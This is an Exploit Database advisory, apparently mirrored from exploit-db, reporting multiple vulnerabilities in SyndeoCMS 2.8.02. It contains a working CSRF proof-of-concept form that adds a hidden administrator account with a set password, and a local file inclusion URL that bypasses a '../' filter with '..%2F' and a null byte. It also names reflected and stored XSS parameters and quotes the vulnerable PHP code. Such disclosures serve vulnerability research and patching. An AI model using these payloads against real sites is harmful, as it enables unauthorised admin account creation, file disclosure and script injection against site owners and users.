SyndeoCMS 2.8.02 – Multiple Vulnerabilities (1)

• Exploit Database
• 80 阅读

• 作者： Abysssec
  日期： 2010-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14887/

• '''
  ________ __ ____
   |\/|/ __ \ /\| || |_ \ 
   | \/ | || | /\ | || | |_) |
   | |\/| | || |/ /\ \| || |_ <Day 4 (0day)
   | || | |__| / ____ \ |__| | |_) |
   |_||_|\____/_/\_\____/|____/ 
  
  '''
   
  Title: syndeocms 2.8.02 Multiple Vulnerabilities
  Affected Version : syndeocms <= 2.8.02 
  VendorSite : http://www.syndeocms.org/
   
  Discovery : abysssec.com
  
   
  Description :
   
  This CMS have many critical vulnerability that we refere to some of those here:
   
   
  Vulnerabilites :
  
  1. CSRF - Add Admin Account:
  
  <html>
  <body>
  <form onsubmit="return checkinput(this);" action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" name="form" method="POST">
  <input class="textfield" type="hidden"name="fullname" value="csrf"/>
  <input class="textfield" type="hidden"name="username" value="csrf_admin"/>
  <input class="textfield" type="hidden"name="password" value="admin123"/>
  <input class="textfield" type="hidden"name="email" value="csrf@admin.com"/>
  <select name="editor">
  <option value="1" selected="">FCKEditor</option>
  <option value="2">Plain text Editor</option>
  </select>
  <input type="checkbox" checked="" name="initial" value="1"/>
  <input class="textfield" type="hidden" value=""name="sections"/>
  <input type="radio" name="access_1" value="1"/>
  <input type="radio" name="access_2" value="1"/>
  .
  .
  .
  <input type="radio" name="access_15" value="1"/>
  <input type="radio" name="m_access[0]" value="1"/>
  .
  .
  .
  <input type="radio" name="m_access[21]" value="1"/>
  <input class="savebutton" type="submit" name="savebutton" value=" Save"/>
  </form>
  </body>
  </html>
  -------------------------------------
  2. LFI (Local File Inclusion):
  
  http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00
  
  in starnet\core\con_configuration.inc.php file, As you may noticed theme parameter is checked for "../" and could be bypass by with "..%2F":
  line 61-73:
  switch ($modoption) // start of switch
  {
  	case save_css :
  	
  		if (IsSet ($_POST['content']))
  		{
  			$content = $_POST['content'];
  		}
  		
  		if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us.
  		{
  			$filename = "themes/$theme/style.css";
  -------------------------------------
  3. xss:
  in starnet\core\con_alerts.inc.php file "email" parameter when "modoption" is "save_alert":
  http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2
  
  4. stored xss:
  in starnet\core\con_alerts.inc.php file "name" parameter when "modoption" is "save_alert":
  http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert
  ------------------------------
  

  Python

  Copy